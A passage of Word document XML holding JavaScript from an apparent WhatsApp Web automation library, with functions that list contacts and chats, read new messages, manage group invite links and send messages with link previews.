          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * returns Promise&lt;void&gt;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window.WAPI.leaveGroup = function (groupId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    groupId = typeof groupId == "string" ? groupId : groupId._serialized;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var group = WAPI.getChat(groupId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.GroupActions.sendExitGroup(group)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window.WAPI.getAllContacts = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.Contact.map((contact) =&gt; WAPI._serializeContactObj(contact));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all contact objects from store, filters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{Array|*} List of contacts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window.WAPI.getMyContacts = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.Contact.filter((contact) =&gt; contact.isMyContact === true).map((contact) =&gt; WAPI._serializeContactObj(contact));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contact object from store by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contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns {T|*} Contact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window.WAPI.getContact = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const found = window.Store.Contact.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.WAPI._serializeContactObj(found);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window.WAPI.syncContacts = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Store.Contact.sync()</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all chat objects from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{Array|*} List of chats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window.WAPI.getAllChats = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.Chat.map((chat) =&gt; WAPI._serializeChatObj(chat));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window.WAPI.haveNewMsg = function (chat) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return chat.unreadCount &gt; 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window.WAPI.getAllChatsWithNewMsg = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.Chat.filter(window.WAPI.haveNewMsg).map((chat) =&gt; WAPI._serializeChatObj(chat));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all chat IDs from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{Array|*} List of chat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window.WAPI.getAllChatIds = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Store.Chat.map((chat) =&gt; chat.id._serialized || chat.id);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window.WAPI.getAllNewMessages = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return WAPI.getAllChatsWithNewMsg().map(c =&gt; WAPI.getChat(c.id)).flatMap(c =&gt; c.msgs._models.filter(x =&gt; x.isNewMsg)).map(WAPI._serializeMessageObj)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nnoo longer determined by x.ack==-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">window.WAPI.getAllUnreadMessages = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.Chat.models.filter(chat =&gt; chat.unreadCount &amp;&amp; chat.unreadCount &gt; 0).map(unreadChat =&gt; unreadChat.msgs.models.slice(-1 * unreadChat.unreadCount)).flat().map(WAPI._serializeMessageObj)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window.WAPI.getIndicatedNewMessages = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return JSON.stringify(Store.Chat.models.filter(chat =&gt; chat.unreadCount).map(chat =&gt; { return { id: chat.id, indicatedNewMessages: chat.msgs.models.slice(Math.max(chat.msgs.length - chat.unreadCount, 0)).filter(msg =&gt; !msg.id.fromMe)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window.WAPI.getSingleProperty = function (namespace, id, property) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (Store[namespace] &amp;&amp; Store[namespace].get(id) &amp;&amp; Object.keys(Store[namespace].get(id)).find(x =&gt; x.includes(property))) return Store[namespace].get(id)[property];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 404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window.WAPI.getAllChatsWithMessages = async function (onlyNew) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let x = [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (onlyNew) { x.push(WAPI.getAllChatsWithNewMsg().map(c =&gt; WAPI.getChat(c.id._serialized))); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        x.push(WAPI.getAllChatIds().map((c) =&gt; WAPI.getChat(c)));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Promise.all(x)).flatMap(x =&gt; x);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return JSON.stringify(result);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all groups objects from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{Array|*} List of chats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window.WAPI.getAllGroups = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.WAPI.getAllChats().filter((chat) =&gt; chat.isGroup);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Sets the chat state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{0|1|2} chatState The state you want to set for the chat. Can be TYPING (1), RECRDING (2) or PAUSED (3);</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window.WAPI.sendChatstate = async function (state, chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    switch (state) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        case 0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await window.Store.ChatStates.sendChatStateComposing(chatId);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1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await window.Store.ChatStates.sendChatStateRecording(chatId);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case 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await window.Store.ChatStates.sendChatStatePaused(chatId);</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default:</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chat object from store by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chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns {T|*} Chat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window.WAPI.getChat = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!id) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    id = typeof id == "string" ? id : id._serialized;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const found = window.Store.Chat.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (found) found.sendMessage = (found.sendMessage) ? found.sendMessage : function () { return window.Store.sendMessage.apply(this, arguments); };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return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Get your status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string} to '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * returns: {string,string} and string -"Hi, I am using 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window.WAPI.getStatus = async (id) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.MyStatus.getStatus(id)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window.WAPI.getChatByName = function (name) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.WAPI.getAllChats().find((chat) =&gt; chat.name === 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window.WAPI.sendImageFromDatabasePicBot = function (picId, chatId, caption) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chatDatabase = window.WAPI.getChatByName('DATABASEPICBOT');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var msgWithImg = chatDatabase.msgs.find((msg) =&gt; msg.caption == picId);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(msgWithImg === undefined)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chatSend = WAPI.getChat(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chatSend === undefined)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oldCaption = msgWithImg.caption;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msgWithImg.id.id = window.WAPI.getNewId();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    msgWithImg.id.remote = chatId;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    msgWithImg.t = Math.ceil(new Date().getTime() / 1000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    msgWithImg.to = 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(caption !== undefined &amp;&amp; caption !== '') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        msgWithImg.caption = caption;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msgWithImg.caption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msgWithImg.collection.send(msgWithImg).then(function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        msgWithImg.caption = oldCaption;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window.WAPI.getGeneratedUserAgent = function (useragent) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!useragent.includes('WhatsApp')) return 'WhatsApp/0.4.315 ' + useragent;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return useragent.replace(useragent.match(/WhatsApp\/([.\d])*/g)[0].match(/[.\d]*/g).find(x =&gt; x), window.Debug.VERSION)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window.WAPI.getWAVersion = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return window.Debug.VERSION;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Automatically sends a link with the auto generated link preview. You can also add a custom message to be added.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param chatId </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param url string A link, for example for youtube. e.g https://www.youtube.com/watch?v=61O-Galzc5M</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param text string Custom text as body of the message, this needs to include the link or it will be appended after the link.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window.WAPI.sendLinkWithAutoPreview = async function (chatId, url, text) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    text = text || '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chatSend = WAPI.getChat(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chatSend === undefined)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linkPreview = await Store.WapQuery.queryLinkPreview(url);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return (await chatSend.sendMessage(text.includes(url) ? text : `${url}\n${text}`, { linkPreview })) == 'OK'</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window.WAPI.sendMessageWithThumb = function (thumb, url, title, description, text, chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chatSend = WAPI.getChat(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (chatSend === undefined)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linkPreview = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        canonicalUrl: url,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        description: description,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        matchedText: url,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        title: title,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        thumbnail: thumb // Thumbnail max size allowed: 200x200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chatSend.sendMessage(text.includes(url) ? text : `${url}\n${text}`, { linkPreview: linkPreview, mentionedJidList: [], quotedMsg: null, quotedMsgAdminGroupJid: null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window.WAPI.revokeGroupInviteLink = async function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chat.isGroup) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.GroupInvite.revokeGroupInvite(chat);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window.WAPI.getGroupInviteLink = async function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chat.isGroup) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Store.GroupInvite.queryGroupInviteCode(chat);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return `https://chat.whatsapp.com/${chat.inviteCode}`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window.WAPI.inviteInfo = async function (link) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.WapQuery.groupInviteInfo(link.split('\/').pop()).then(r =&gt; r.status === 200 ? WAPI.quickClean(r) : r.status);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window.WAPI.getNewId = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var text = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";</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(var i = 0; i &lt; 20; i++)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
